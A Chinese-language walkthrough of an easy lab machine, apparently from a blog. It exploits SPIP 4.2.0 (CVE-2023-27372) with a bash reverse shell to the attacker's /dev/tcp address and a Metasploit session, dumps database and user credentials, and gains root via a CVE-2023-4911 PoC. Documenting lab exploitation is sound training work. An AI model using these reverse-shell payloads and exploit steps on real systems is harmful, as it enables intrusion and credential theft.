难度:easy
kali:192.168.56.104
靶机:192.168.56.141
端口扫描
┌──(root㉿kali2)-[~/Desktop]
└─# nmap 192.168.56.141
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-31 20:10 CST
Nmap scan report for 192.168.56.141
Host is up (0.00074s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:AB:A5:2D (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds
开了22 80两个端口
扫一下目录
# gobuster dir -u http://192.168.56.141 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.141
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,txt,php,bak,zip
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.php (Status: 200) [Size: 7519]
/local (Status: 301) [Size: 316] [--> http://192.168.56.141/local/]
/javascript (Status: 301) [Size: 321] [--> http://192.168.56.141/javascript/]
/vendor (Status: 301) [Size: 317] [--> http://192.168.56.141/vendor/]
/config (Status: 301) [Size: 317] [--> http://192.168.56.141/config/]
/tmp (Status: 301) [Size: 314] [--> http://192.168.56.141/tmp/]
/LICENSE (Status: 200) [Size: 35147]
/IMG (Status: 301) [Size: 314] [--> http://192.168.56.141/IMG/]
/spip.php (Status: 200) [Size: 7518]
/htaccess.txt (Status: 200) [Size: 4307]
/ecrire (Status: 301) [Size: 317] [--> http://192.168.56.141/ecrire/]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/prive (Status: 301) [Size: 316] [--> http://192.168.56.141/prive/]
/server-status (Status: 403) [Size: 279]
还是有很多东西的
去web看一下
我去扫出来的几个目录看了一下没有发现什么有用的信息
那就看框架有什么漏洞,源码发现是SPIP 4.2.0的框架
然后搜到了一个cve
CVE-2023-27372
没想到漏洞库居然有exp
┌──(root㉿kali2)-[~/Desktop]
└─# searchsploit spip
----------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------- ---------------------------------
SPIP - 'connect' PHP Injection (Metasploit) | php/remote/27941.rb
SPIP 1.8.2 - 'Spip_RSS.php' Remote Command Execution | php/webapps/27172.txt
SPIP 1.8.2g - Remote Command Execution | php/webapps/1482.php
SPIP 1.8.3 - 'Spip_login.php' Remote File Inclusion | php/webapps/27589.txt
SPIP 1.8/1.9 - 'index.php3' Cross-Site Scripting | php/webapps/27158.txt
SPIP 1.8/1.9 - Multiple SQL Injections | php/webapps/27157.txt
SPIP 2.1 - 'var_login' Cross-Site Scripting | php/webapps/34388.txt
SPIP 2.x - Multiple Cross-Site Scripting Vulnerabili | php/webapps/37397.html
SPIP 3.1.1/3.1.2 - File Enumeration / Path Traversal | php/webapps/40596.txt
SPIP 3.1.2 - Cross-Site Request Forgery | php/webapps/40597.txt
SPIP 3.1.2 Template Compiler/Composer - PHP Code Exe | php/webapps/40595.txt
SPIP < 2.0.9 - Arbitrary Copy All Passwords to '.XML | php/webapps/9448.py
SPIP CMS < 2.0.23/ 2.1.22/3.0.9 - Privilege Escalati | php/webapps/33425.py
spip v4.1.10 - Spoofing Admin account | php/webapps/51557.txt
SPIP v4.2.0 - Remote Code Execution (Unauthenticated | php/webapps/51536.py
----------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
不知道为什么我的shell弹不过去
──(root㉿kali2)-[~/Desktop]
└─# python3 51536.py -u http://192.168.56.141/ -v -c "bash -c 'bash -i >& /dev/tcp/192.168.56.104/4567 0>&1'"
[+] Anti-CSRF token found : iYe2q77AjJpzr7DiCN466DffCNPeUp0xMFqKM8HZ2jA5IWNjp6Vhzoioj1CV4d/wM8wzPYKIJAYCiLEY+fBNfgPHcNshG3+b
[+] Execute this payload : s:75:"<?php system('bash -c 'bash -i >& /dev/tcp/192.168.56.104/4567 0>&1''); ?>";
用msf上面的自动攻击吧
msf6 > search spip
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/spip_connect_exec 2012-07-04 excellent Yes SPIP connect Parameter PHP Injection
1 exploit/unix/webapp/spip_rce_form 2023-02-27 excellent Yes SPIP form PHP Injection
Interact with a module by name or index. For example info 1, use 1 or use exploit/unix/webapp/spip_rce_form
msf6 > use 1
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/spip_rce_form) > options
Module options (exploit/unix/webapp/spip_rce_form):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type
:host:port][...]
RHOSTS yes The target host(s), see https://docs.metaspl
oit.com/docs/using-metasploit/basics/using-m
etasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is
randomly generated)
TARGETURI / yes The base path to SPIP application
URIPATH no The URI to use for this exploit (default is
random)
VHOST no HTTP server virtual host
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen
on. This must be an address on the local machi
ne or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specifie
d)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic (PHP In-Memory)
View the full module info with the info, or info -d command.
msf6 exploit(unix/webapp/spip_rce_form) > set rhost http://192.168.56.141/
rhost => http://192.168.56.141/
msf6 exploit(unix/webapp/spip_rce_form) > set lhost 192.168.56.104
lhost => 192.168.56.104
msf6 exploit(unix/webapp/spip_rce_form) > run
[*] Started reverse TCP handler on 192.168.56.104:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] SPIP Version detected: 4.2.0
[+] The target appears to be vulnerable.
[*] Got anti-csrf token: iYe2q77AjJpzr7DiCN466DffCNPeUp0xMFqKM8HZ2jA5IWNjp6Vhzoioj1CV4d/wM8wzPYKIJAYCiLEY+fBNfgPHcNshG3+b
[*] 192.168.56.141:80 - Attempting to exploit...
[*] Sending stage (39927 bytes) to 192.168.56.141
[*] Meterpreter session 1 opened (192.168.56.104:4444 -> 192.168.56.141:49824) at 2024-03-31 20:58:58 +0800
meterpreter > shell
弹到kali
┌──(root㉿kali2)-[~/Desktop]
└─# nc -lvnp 4567
listening on [any] 4567 ...
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.141] 57112
bash: cannot set terminal process group (829): Inappropriate ioctl for device
bash: no job control in this shell
www-data@pipy:/var/www/html$
升级shell
www-data@pipy:/var/www/html$ python3 -c 'import pty; pty.spawn("/bin/bash")'
在/var/www/html/config/connect.php发现数据库账号密码
www-data@pipy:/var/www/html/config$ ls -al
ls -al
total 48
drwxr-xr-x 2 www-data www-data 4096 Oct 3 15:55 .
drwxr-xr-x 11 www-data www-data 4096 Oct 4 17:41 ..
-rw-rw-rw- 1 www-data www-data 197 Oct 3 15:55 .htaccess
-rw-rw-rw- 1 www-data www-data 0 Oct 3 15:55 .ok
-rw-rw-rw- 1 www-data www-data 109 Oct 3 15:54 chmod.php
-rw-rw-rw- 1 www-data www-data 163 Oct 3 15:55 cles.php
-rw-rw-rw- 1 www-data www-data 243 Oct 3 15:54 connect.php
-rw-r--r-- 1 www-data www-data 17240 Feb 23 2023 ecran_securite.php
-rw-r--r-- 1 www-data www-data 83 Feb 23 2023 remove.txt
www-data@pipy:/var/www/html/config$ cat connect.php
cat connect.php
<?php
if (!defined("_ECRIRE_INC_VERSION")) return;
defined('_MYSQL_SET_SQL_MODE') || define('_MYSQL_SET_SQL_MODE',true);
$GLOBALS['spip_connect_version'] = 0.8;
spip_connect_db('localhost','','root','dbpassword','spip','mysql', 'spip','','');
进入mysql
www-data@pipy:/var/www/html/config$ mysql -u root -p
mysql -u root -p
Enter password: dbpassword
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 73
Server version: 10.6.12-MariaDB-0ubuntu0.22.04.1 Ubuntu 22.04
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show database;
show database;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'database' at line 1
MariaDB [mysql]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| spip |
| sys |
+--------------------+
5 rows in set (0.000 sec)
MariaDB [mysql]> use spip;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [spip]> show tables;
+-------------------------+
| Tables_in_spip |
+-------------------------+
| spip_articles |
| spip_auteurs |
| spip_auteurs_liens |
| spip_depots |
| spip_depots_plugins |
| spip_documents |
| spip_documents_liens |
| spip_forum |
| spip_groupes_mots |
| spip_jobs |
| spip_jobs_liens |
| spip_meta |
| spip_mots |
| spip_mots_liens |
| spip_paquets |
| spip_plugins |
| spip_referers |
| spip_referers_articles |
| spip_resultats |
| spip_rubriques |
| spip_syndic |
| spip_syndic_articles |
| spip_types_documents |
| spip_urls |
| spip_versions |
| spip_versions_fragments |
| spip_visites |
| spip_visites_articles |
+-------------------------+
28 rows in set (0.000 sec)
MariaDB [spip]> select * from spip_auteurs;
+-----------+--------+-----+-----------------+----------+----------+--------+--------------------------------------------------------------+---------+-----------+-----------+---------------------+-----+--------+---------------------+-----------------------------------+----------------------------------+---------------------------------------------------------------------------------------------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------+--------+------+----------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| id_auteur | nom | bio | email | nom_site | url_site | login | pass | low_sec | statut | webmestre | maj | pgp | htpass | en_ligne | alea_actuel | alea_futur | prefs | cookie_oubli | source | lang | imessage | backup_cles |
+-----------+--------+-----+-----------------+----------+----------+--------+--------------------------------------------------------------+---------+-----------+-----------+---------------------+-----+--------+---------------------+-----------------------------------+----------------------------------+---------------------------------------------------------------------------------------------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------+--------+------+----------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 1 | Angela | | angela@pipy.htb | | | angela | 4ng3l4 | | 0minirezo | oui | 2023-10-04 17:28:39 | | | 2023-10-04 13:50:34 | 387046876651c39a45bc836.13502903 | 465278670651d6da4349d85.01841245 | a:4:{s:7:"couleur";i:2;s:7:"display";i:2;s:18:"display_navigation";s:22:"navigation_avec_icones";s:3:"cnx";s:0:"";} | NULL | spip | | | 3HnqCYcjg+hKOjCODrOTwhvDGXqQ34zRxFmdchyPL7wVRW3zsPwE6+4q0GlAPo4b4OGRmzvR6NNFdEjARDtoeIAxH88cQZt2H3ENUggrz99vFfCmWHIdJgSDSOI3A3nmnfEg43BDP4q9co/AP0XIlGzGteMiSJwc0fCXOCxzCW9NwvzJYM/u/8cWGGdRALd7fzFYhOY6DmokVnIlwauc8/lwRyNbam1H6+g5ju57cI8Dzll+pCMUPhhti9RvC3WNzC2IUcPnHEM= |
| 2 | admin | | admin@pipy.htb | | | admin | $2y$10$.GR/i2bwnVInUmzdzSi10u66AKUUWGGDBNnA7IuIeZBZVtFMqTsZ2 | | 1comite | non | 2023-10-04 17:31:03 | | | 2023-10-04 17:31:03 | 1540227024651d7e881c21a5.84797952 | 439334464651da1526dbb90.67439545 | a:4:{s:7:"couleur";i:2;s:7:"display";i:2;s:18:"display_navigation";s:22:"navigation_avec_icones";s:3:"cnx";s:0:"";} | 1118839.6HqFdtVwUs3T6+AJRJOdnZG6GFPNzl4/wAh9i0D1bqfjYKMJSG63z4KPzonGgNUHz+NmYNLbcIM83Tilz5NYrlGKbw4/cDDBE1mXohDXwEDagYuW2kAUYeqd8y5XqDogNsLGEJIzn0o= | spip | fr | oui | |
+-----------+--------+-----+-----------------+----------+----------+--------+--------------------------------------------------------------+---------+-----------+-----------+---------------------+-----+--------+---------------------+-----------------------------------+----------------------------------+---------------------------------------------------------------------------------------------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------+--------+------+----------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+可以看到Angela的密码是4ng3l4
切换到angela
┌──(root㉿kali2)-[~/Desktop]
└─# ssh angela@192.168.56.141
angela@192.168.56.141's password:
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-84-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun Mar 31 01:11:56 PM UTC 2024
System load: 0.0 Processes: 123
Usage of /: 71.2% of 8.02GB Users logged in: 0
Memory usage: 30% IPv4 address for enp0s3: 192.168.56.141
Swap usage: 0%
Expanded Security Maintenance for Applications is not enabled.
23 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Thu Oct 5 14:13:59 2023 from 192.168.0.130
angela@pipy:~$ whomai
Command 'whomai' not found, did you mean:
command 'whoami' from deb coreutils (8.32-4.1ubuntu1)
Try: apt install <deb name>
angela@pipy:~$ whoami
angela
拿到user flag
angela@pipy:~$ ls -al
total 40
drwxr-x--- 6 angela angela 4096 Oct 17 17:47 .
drwxr-xr-x 3 root root 4096 Oct 4 14:33 ..
lrwxrwxrwx 1 angela angela 9 Oct 17 17:47 .bash_history -> /dev/null
-rw-r--r-- 1 angela angela 220 Jan 6 2022 .bash_logout
-rw-r--r-- 1 angela angela 3771 Jan 6 2022 .bashrc
drwx------ 3 angela angela 4096 Oct 5 13:42 .cache
drwxrwxr-x 3 angela angela 4096 Oct 3 16:17 .local
-rw-r--r-- 1 angela angela 807 Jan 6 2022 .profile
drwx------ 3 angela angela 4096 Oct 3 16:21 snap
drwx------ 2 angela angela 4096 Oct 2 17:58 .ssh
-rw-r--r-- 1 angela angela 0 Oct 2 17:59 .sudo_as_admin_successful
-rw------- 1 angela angela 33 Oct 5 14:15 user.txt
提权用到一个CVE
CVE-2023-4911
leesh3288/CVE-2023-4911: PoC for CVE-2023-4911 (github.com)
angela@pipy:~$ cd ~
angela@pipy:~$ vim exp.c
angela@pipy:~$ gcc exp.c -o exp
angela@pipy:~$ chmod +x exp
angela@pipy:~$ ./exp
angela@pipy:~$ vim gen_libc.py
angela@pipy:~$ chmod +x gen_libc.py
angela@pipy:~$ python3 gen_libc.py
[*] Checking for new versions of pwntools
To disable this functionality, set the contents of /home/angela/.cache/.pwntools-cache-3.10/update to 'never' (old way).
Or add the following lines to ~/.pwn.conf or ~/.config/pwn.conf (or /etc/pwn.conf system-wide):
[update]
interval=never
[!] An issue occurred while checking PyPI
[*] You have the latest version of Pwntools (4.11.0)
[*] '/lib/x86_64-linux-gnu/libc.so.6'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
angela@pipy:~$ ./exp
try 100
try 200
# whoami
root
598
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
